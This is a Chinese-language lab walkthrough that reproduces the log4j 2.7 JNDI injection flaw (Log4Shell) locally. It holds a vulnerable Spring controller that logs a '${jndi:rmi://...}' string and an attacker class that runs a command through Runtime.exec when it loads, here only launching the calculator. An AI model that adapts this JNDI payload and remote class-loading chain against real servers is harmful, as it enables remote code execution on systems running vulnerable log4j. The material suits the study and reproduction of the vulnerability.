1.环境
log4j-core 2.7
log4j-api 2.7
jdk 1.8
2.核心要点
核心的漏洞代码在于org.apache.logging.log4j.core.lookup.StrSubstitutor 该类中,首先利用idea 全局搜索以下方法。
protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,
final int startPos, final int endPos) {
final StrLookup resolver = getVariableResolver();
if (resolver == null) {
return null;
}
return resolver.lookup(event, variableName);
}
并在关键位置打断点
方法执行到该处才算成功。
3 .搭建攻击服务与被攻击服务
被攻击服务,其主要代码如下:
import org.apache.log4j.Logger;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;
import javax.servlet.http.HttpServletResponse;
@Controller
@RequestMapping("Test")
public class TestController {
Logger log = Logger.getLogger(TestController.class);
@RequestMapping("/test")
public String index(Model model, HttpServletResponse response) {
log.info("${jndi:rmi://127.0.0.1:1099/Test}"); //指向rmi服务
return "index";
}
}
主要步骤: 攻击者服务需要一个web服务存放执行脚本,然后再用rmi指向该web服务。
利用Python开启一个简单的web服务,并放上攻击脚本,放在其目录下:
打开计算器的脚本:
public class MyServer {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"calc"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
}
}
}
再用rmi指向该服务
最后执行被攻击者的代码,可以通过web发起http请求:
主要看是否进入断点,最好不要同时引入logback.jar这个包,要不然跳不进断点。最终弹出计算器:
仅供学习交流!!!
参考:
[1]: https://www.cnblogs.com/wbo112/p/15690699.html
[2]: https://zhuanlan.zhihu.com/p/443640671